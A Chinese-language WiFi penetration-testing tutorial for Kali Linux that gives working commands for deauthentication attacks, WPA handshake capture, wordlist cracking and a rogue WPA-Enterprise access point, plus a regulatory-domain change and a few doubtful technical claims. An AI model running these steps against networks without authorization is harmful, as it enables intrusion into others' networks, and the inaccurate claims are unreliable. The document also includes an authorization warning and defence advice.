1. Kali Linux入门基础与环境搭建
1.1 系统安装与配置指南
对于刚接触网络安全的新手来说,Kali Linux的安装是第一个需要跨越的门槛。我建议采用USB启动盘的方式安装,这样既不会影响原有系统,又能随时携带。具体操作时需要注意几个关键点:首先下载官方镜像时务必验证SHA256校验值,避免使用来路不明的镜像文件。制作启动盘推荐使用Rufus工具,在"分区方案"选择"GPT","目标系统"选择"UEFI",文件系统保持FAT32默认设置。
安装完成后,首次启动需要进行的几个必要配置:
- 更新软件源:修改/etc/apt/sources.list文件,推荐使用国内镜像源提升下载速度
- 执行完整系统更新:
sudo apt update && sudo apt full-upgrade -y - 安装中文支持:
sudo apt install fonts-wqy-zenhei fonts-wqy-microhei - 配置基础工具链:
sudo apt install kali-linux-default
重要提示:切勿在真实生产环境或他人网络中进行未经授权的测试,所有实验应在自己搭建的测试环境进行。
1.2 无线网卡选购与驱动配置
不是所有无线网卡都支持监听模式(Monitor Mode),这是进行WiFi渗透测试的先决条件。经过多年实战,我发现这些型号性价比和兼容性最佳:
- Alfa AWUS036ACH (802.11ac双频)
- TP-Link TL-WN722N v1 (需注意v2/v3版本不支持)
- Panda PAU09 (内置放大器)
安装驱动时常见的问题是内核模块冲突。如果遇到iwconfig看不到网卡的情况,可以尝试:
bash复制sudo apt install dkms
sudo apt install realtek-rtl88xxau-dkms
sudo modprobe 88XXau
需要模型API调用? 免费领10W Token,多模型网关一键接入 Claude、DeepSeek 等主流模型。
2. WiFi安全基础与渗透测试原理
2.1 无线加密协议演进史
从早期的WEP到现在的WPA3,无线加密协议在不断进化。理解它们的区别对渗透测试至关重要:
| 协议类型 | 加密方式 | 破解难度 | 典型攻击方法 |
|---|---|---|---|
| WEP | RC4流加密 | 极易 | ARP重放攻击、FMS攻击 |
| WPA-PSK | TKIP/CCMP | 中等 | 字典攻击、PMKID捕获 |
| WPA2 | AES-CCMP | 较难 | KRACK攻击、热点欺骗 |
| WPA3 | SAE握手 | 极难 | 目前尚无公开漏洞 |
2.2 监听模式工作原理
当网卡进入监听模式,实际上是在OSI模型的物理层进行数据帧捕获。与普通模式不同,此时网卡:
- 不关联任何AP
- 接收所有信道数据
- 保留完整的802.11帧头
- 可以捕获非目标MAC地址的数据包
启用监听模式的正确姿势:
bash复制sudo airmon-ng check kill
sudo ip link set wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ip link set wlan0 up
3. 实战WPA/WPA2渗透测试
3.1 完整攻击流程分解
- 目标发现阶段:
bash复制sudo airodump-ng wlan0mon
重点关注ESSID、BSSID、信道(CH)和客户端数量(#STATION)
- 数据包捕获:
bash复制sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon
这里-c指定信道,--bssid指定目标AP,-w设置输出文件名
- 强制解除认证(获取握手包):
bash复制sudo aireplay-ng -0 10 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon
-0表示解除认证攻击,10是攻击次数,-c指定目标客户端
3.2 高效字典生成技巧
好的字典是成功的关键。推荐使用crunch工具生成定制化字典:
bash复制crunch 8 12 0123456789abcdef -o dict.txt
这表示生成8-12位由十六进制字符组成的密码。实际使用中可以:
- 结合目标信息(如电话区号、生日等)
- 使用cewl爬取目标网站生成个性化字典
- 合并常用密码列表(如rockyou.txt)
实测发现,现代路由器默认密码多包含:设备型号+年份、admin+手机尾号等组合
4. 进阶技巧与防御方案
4.1 企业级WPA-Enterprise破解
针对使用Radius认证的企业网络,可以采用EAPHammer工具搭建恶意AP:
bash复制sudo apt install eaphammer
sudo eaphammer --cert-wizard # 生成伪造证书
sudo eaphammer --wpa-ent --essid CorpWiFi --interface wlan0
这种攻击利用了用户不会验证证书真实性的心理,属于中间人攻击的一种。
4.2 防护措施建议
作为网络管理员,应该采取这些防护措施:
- 启用WPA3-SAE加密(如设备支持)
- 设置复杂的预共享密钥(建议20位以上随机字符)
- 启用MAC地址过滤(虽可绕过,但增加攻击难度)
- 关闭WPS/QSS功能
- 定期检查连接设备日志
对于渗透测试者,每次测试后应该:
bash复制sudo airmon-ng stop wlan0mon
sudo systemctl start NetworkManager
确保网卡恢复正常模式,避免影响正常网络使用。
5. 常见问题排错指南
5.1 典型错误解决方案
问题1:aireplay-ng提示"no such BSSID available"
- 检查网卡与AP距离,确保信号强度大于-70dBm
- 确认输入的BSSID完全匹配(区分大小写)
- 尝试更换信道:
iwconfig wlan0mon channel 6
问题2:捕获不到握手包
- 增加解除认证攻击次数(-0参数)
- 在客户端活跃时段测试(工作日上午最佳)
- 使用
--ignore-negative-one参数绕过某些网卡限制
问题3:hashcat跑不出密码
- 确认握手包完整:
pyrit -r capture.cap analyze - 尝试简化字典规则(先测试6位纯数字)
- 使用GPU加速:
hashcat -m 22000 capture.hc22000 -a 3 ?d?d?d?d?d?d
5.2 性能优化参数
在较新的Kali版本中,这些内核参数可以提升捕获效率:
bash复制echo 0 > /proc/sys/net/ipv4/conf/all/rp_filter
iw reg set BO
sudo ifconfig wlan0mon txqueuelen 5000
对于VMware虚拟机用户,需要额外配置:
- 编辑.vmx文件添加:
code复制ethernet0.noPromisc = "FALSE"
ethernet0.bsdName = "en0"
- 在虚拟机设置中将网卡模式改为"桥接"
